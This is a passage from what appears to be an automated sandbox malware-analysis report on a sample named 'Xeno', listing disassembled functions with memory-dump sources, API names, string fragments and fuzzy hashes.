                            • Instruction Fuzzy Hash: 6751F431608211CFDB218F24DC823DB73F1EF85318F05893DE98A8B292DB799946D796
                            Function 00428811 Relevance: .1, Instructions: 146COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0d2b4147b0c33ffffbca9aeb70c0d341d23aa88f0486baf88956de86d2ec1176
                            • Instruction ID: cce8a30017c5c9029ce8138481df1a1f5907d11f291a39d8f2ae67990d89bee5
                            • Opcode Fuzzy Hash: 0d2b4147b0c33ffffbca9aeb70c0d341d23aa88f0486baf88956de86d2ec1176
                            • Instruction Fuzzy Hash: EA411EB06493A08AD7309F24D86136BB3F1FFA2300F446A1DD5D14F7A6EB798540DB4A
                            Function 0043AFD0 Relevance: .1, Instructions: 141COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 9d28f3aa5901e9695b29893484d7d223314e0abc8c5db0e409570cf9815bd019
                            • Instruction ID: 3277df123f6d12a6cfdd39d99e6dc8e3eddc28dcb88e1f49470f458588e81730
                            • Opcode Fuzzy Hash: 9d28f3aa5901e9695b29893484d7d223314e0abc8c5db0e409570cf9815bd019
                            • Instruction Fuzzy Hash: E33157B1A04300ABE714AE15ED51B3BB7A8DF89748F10582DFA9953242E335ED0087DB
                            Function 0043F82B Relevance: .1, Instructions: 132COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1e3050211ca69d08b0a5865b02cb13b43dc5ed76d776bfcb1a98241992f1b736
                            • Instruction ID: c96795e88930af48fe39d639d2fbc3475bf893d2a107e9313ce8220226ca3bfd
                            • Opcode Fuzzy Hash: 1e3050211ca69d08b0a5865b02cb13b43dc5ed76d776bfcb1a98241992f1b736
                            • Instruction Fuzzy Hash: 8C312432F082500FCB18DF358C9123BBAD79FDA214F29D53EC496CB266C928C90A8649
                            Function 0042C790 Relevance: .1, Instructions: 117COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5d8a27910de914bda2216dff7dbaf711d2501371b8c3a7ed62d201147104d8b8
                            • Instruction ID: bca9753c0db80727d97926559bcf6bbce384b6e40a89ff9267eea02be64979a6
                            • Opcode Fuzzy Hash: 5d8a27910de914bda2216dff7dbaf711d2501371b8c3a7ed62d201147104d8b8
                            • Instruction Fuzzy Hash: 6A314873E21A3407D7088D3E9C5026AB1C35BD5265B9EC379ED699F3C6DA34DC1282D0
                            Function 0042EA70 Relevance: .1, Instructions: 104COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a4775e5fd683a2476c83e46e66ebfda2bf2ebff5d5b936a88187511111cdf3d5
                            • Instruction ID: 838d05a402944fcbd4815cc20ba2c9b8401c5b9d6a2c11771bdc51aa1eca9dd1
                            • Opcode Fuzzy Hash: a4775e5fd683a2476c83e46e66ebfda2bf2ebff5d5b936a88187511111cdf3d5
                            • Instruction Fuzzy Hash: 2D316022B453718AD710C52944C12A2BF039B56365F9D876AC9511B3C7C21BED0BD3DE
                            Function 0042E6F5 Relevance: .1, Instructions: 82COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 34885059f9085e4bbcfbbcd216d759fcf1971f6b3b9d4a29b5fa11b818d26347
                            • Instruction ID: 89ce3e1cd63448e95d9ea977b6249ea921f7a27e259004478ee486d731a73b76
                            • Opcode Fuzzy Hash: 34885059f9085e4bbcfbbcd216d759fcf1971f6b3b9d4a29b5fa11b818d26347
                            • Instruction Fuzzy Hash: 9E21E42460C7928AD715CF369820737BFD59FE7301F14486EE4C5E7282DB38890AC7AA
                            Function 0040BC4E Relevance: .1, Instructions: 70COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1689a5f88bb74924eec20baff44963788ed4304019a8286734629da0a012c95f
                            • Instruction ID: 794b843a143bcd502fab941c3754c9a69f0820560203a1b601cccb8c4751c18a
                            • Opcode Fuzzy Hash: 1689a5f88bb74924eec20baff44963788ed4304019a8286734629da0a012c95f
                            • Instruction Fuzzy Hash: CE11033628B1205BD30CC724CC96AAA7BE3DBC2308F6A612EE05257781CD7CD503864D
                            Function 00437380 Relevance: .1, Instructions: 64COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                            • Instruction ID: b81a1004e5e4804e305fb768ae033261721205d57292a4ad13404709f794b4d6
                            • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                            • Instruction Fuzzy Hash: A4112933A081D40EC3228D3C84005A5BFA30BA7634F19939AF8F59B2D2D6268D8BD359
                            Function 0042E6F3 Relevance: .1, Instructions: 64COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cc0aa79595b275abc8aa3da5e1bf769271090754294d3210f408a014c42db77a
                            • Instruction ID: 9bbfa5095f94736bdd0b7ac57f9f149f9e7fe846c8efefe0cee6ce9ca4ff5c54
                            • Opcode Fuzzy Hash: cc0aa79595b275abc8aa3da5e1bf769271090754294d3210f408a014c42db77a
                            • Instruction Fuzzy Hash: 02110625A1C7518BD304CF369C20637BBD59BD6301F14886DE5C5E7282EB34890A879A
                            Function 0042A9B0 Relevance: .1, Instructions: 63COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0eb13973a446c5ad41e135496f900d31ac57488ec4e6597898b97c52ad96242e
                            • Instruction ID: 4445cc4d1cf04cbe348668feb623e8a0f4ebef626527683a5a4cfcafee875c9b
                            • Opcode Fuzzy Hash: 0eb13973a446c5ad41e135496f900d31ac57488ec4e6597898b97c52ad96242e
                            • Instruction Fuzzy Hash: 07019EF1B0131157D7209E56E5C1727A2A96F94708F09483EEC0867342DB7DEC68C2AB
                            Function 004273E0 Relevance: .1, Instructions: 63COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4b12d0630aca062a50208523bffab303bab65f75365dc79f20876aeab8534668
                            • Instruction ID: 160bb0aff718a0d80563d6f2beff850c498fd2fe1c8e11aaffbd6ba781941524
                            • Opcode Fuzzy Hash: 4b12d0630aca062a50208523bffab303bab65f75365dc79f20876aeab8534668
                            • Instruction Fuzzy Hash: FC114C705083808BE3109F69D454B5FBFE4EBD7708F50595CE1C0A62A1DB7AD846CB5B
                            Function 00429986 Relevance: .1, Instructions: 53COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d087e15d8a4fbb82bac9f476366a1c20cf4d353c3c9f5ad1ea2a5e303191d843
                            • Instruction ID: 1348c57935a82017e2e7d7c0fbe8ed9875164d963f3c324bd06c6802b1a78461
                            • Opcode Fuzzy Hash: d087e15d8a4fbb82bac9f476366a1c20cf4d353c3c9f5ad1ea2a5e303191d843
                            • Instruction Fuzzy Hash: D801C4B8B10210CBE6189F15EC90637B362FB97335FD8552FA086523A4E3346C91D65D
                            Function 00419E2F Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 36166aada63f8f746f52f63198250bd09abddde5197fb786955f18ce8a357c26
                            • Instruction ID: aff0648322cd3eb22c8e49e31b70c91ccd7bdb556783ab174ebbdaee0ae4051e
                            • Opcode Fuzzy Hash: 36166aada63f8f746f52f63198250bd09abddde5197fb786955f18ce8a357c26
                            • Instruction Fuzzy Hash: 3C01B53560D3909ED301CE6994406ABFBE29BD7754F18C4AEE4D987282C67CC84A8757
                            Function 0043D630 Relevance: .0, Instructions: 46COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 2eb1cc6a2c45370c73458af01f82d0618735fc6e9c426f69be1b04e2f0c1c130
                            • Instruction ID: f8e2767e4f8b780292dd09947db90586ef83d4d79bd0953a972369d6ed1dfd53
                            • Opcode Fuzzy Hash: 2eb1cc6a2c45370c73458af01f82d0618735fc6e9c426f69be1b04e2f0c1c130
                            • Instruction Fuzzy Hash: F6F0F975914308ABD2104F05AC41D37776EE79E72CF141329F42C132A1E332ED2197A9
                            Function 00402AE0 Relevance: .0, Instructions: 43COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ef34274091a59faee6011be26f6588851a5fd53e4948c962cbb4ad831f3b5260
                            • Instruction ID: e7d746931a02a9e3b8b0465e94f66f676ab71741ea10926aee641c81e01c6aa1
                            • Opcode Fuzzy Hash: ef34274091a59faee6011be26f6588851a5fd53e4948c962cbb4ad831f3b5260
                            • Instruction Fuzzy Hash: DDF0593A7142160BE210CDB5DCC4827F366EBCA210B19453BE940E33C0C872F80282A8
                            Function 0041DD70 Relevance: .0, Instructions: 21COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                            • Instruction ID: 6c094fc25938da344193a14b9d0b09c7a01ce43ceec287ba2bc945c39f2b55b9
                            • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                            • Instruction Fuzzy Hash: BCD0A7B19497B10E57598D3814A05B7FBE8EA47612B18159FE4D1E3209D225DC41469C
                            Function 0043EDA6 Relevance: .0, Instructions: 21COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 13030d5922f3eb165a9f49579f097ac0764a073444c7e4405dcd317374b577db
                            • Instruction ID: bc25dbf4981fac7fc1b7aab02ad173fb12000bfe11e5f168385886125b1ce11a
                            • Opcode Fuzzy Hash: 13030d5922f3eb165a9f49579f097ac0764a073444c7e4405dcd317374b577db
                            • Instruction Fuzzy Hash: 7FE086695416414FC7354A2DC0A19F6BFE4D31F118B006C6DA592C3785E15C8846D658
                            Function 00434231 Relevance: 63.1, APIs: 1, Strings: 35, Instructions: 135memoryCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: AllocString
                            • String ID: +$0$2$4$6$6$9$>$@$B$D$F$H$J$L$N$W$`$a$b$d$e$f$h$j$l$n$p$r$t$v$x$z$|$~
                            • API String ID: 2525500382-875340659
                            • Opcode ID: f523a6bd84bac47ba8271391a5361cccfe3ce0983f1fc1eccc4aec8e8faf0491
                            • Instruction ID: 1a51d386520feef1481d3326c1be35db23ee302095393a555a7615e454403fa2
                            • Opcode Fuzzy Hash: f523a6bd84bac47ba8271391a5361cccfe3ce0983f1fc1eccc4aec8e8faf0491
                            • Instruction Fuzzy Hash: 7D81B22010C7C2C9E336CB3885587DFBFD15BA6328F088E9DD1E95A2D2D2BA4149D767
                            Function 004332B2 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 87COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: Variant$ClearInit
                            • String ID: )$/$3$8$9$:$=$>
                            • API String ID: 2610073882-339973730
                            • Opcode ID: 9c3f66a16f01ae6472bcb48f451aa1cc211d4c2398905fb33a3f9486b933c2cf
                            • Instruction ID: e75863d96dd4293cf013c4d79ab50fb00f7e0396072af12bc1f44a37014a5769
                            • Opcode Fuzzy Hash: 9c3f66a16f01ae6472bcb48f451aa1cc211d4c2398905fb33a3f9486b933c2cf
                            • Instruction Fuzzy Hash: EF41056160C7C18ED336DB38885879BBFE26BD7224F088AADD4E94B2D6C775410AC753
                            Function 0042DD9E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 177COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: FreeLibrary
                            • String ID: .+$g^b)$}V[U
                            • API String ID: 3664257935-2861687672
                            • Opcode ID: c05ad4df0b8df1f83e888981f928685d36c8377a452d6b441c47b5f5a32c864a
                            • Instruction ID: e8de2eb7f5bf02d7fc6ee479da288558e075f19a89de0364b895b614e7ee1860
                            • Opcode Fuzzy Hash: c05ad4df0b8df1f83e888981f928685d36c8377a452d6b441c47b5f5a32c864a
                            • Instruction Fuzzy Hash: E141397050C3819BD7258F24AC54BABBFD1EFE2305F28092DE4DA9B391D7384905CB5A
                            Function 00424A1C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                            Download Yara Rule
                            APIs
                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00424A50
                            • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00424ACA
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2942535470.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.2942535470.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Xeno.jbxd
                            Similarity
                            • API ID: EnvironmentExpandStrings
                            • String ID: KB
                            • API String ID: 237503144-1280518528
                            • Opcode ID: 183cef4234aadb8ef86d9048f336f1672ae2b1aee7a0ea23b248324e77fb3bf4
                            • Instruction ID: 9988d06daaa597567f2b9d2f81522f3ca4097dfb541d98b9febc6db249e57a82
                            • Opcode Fuzzy Hash: 183cef4234aadb8ef86d9048f336f1672ae2b1aee7a0ea23b248324e77fb3bf4
                            • Instruction Fuzzy Hash: C2310136B042394FEF14CF64EC117EE67A2FB85704F198178D916AF2D5DEB19A028784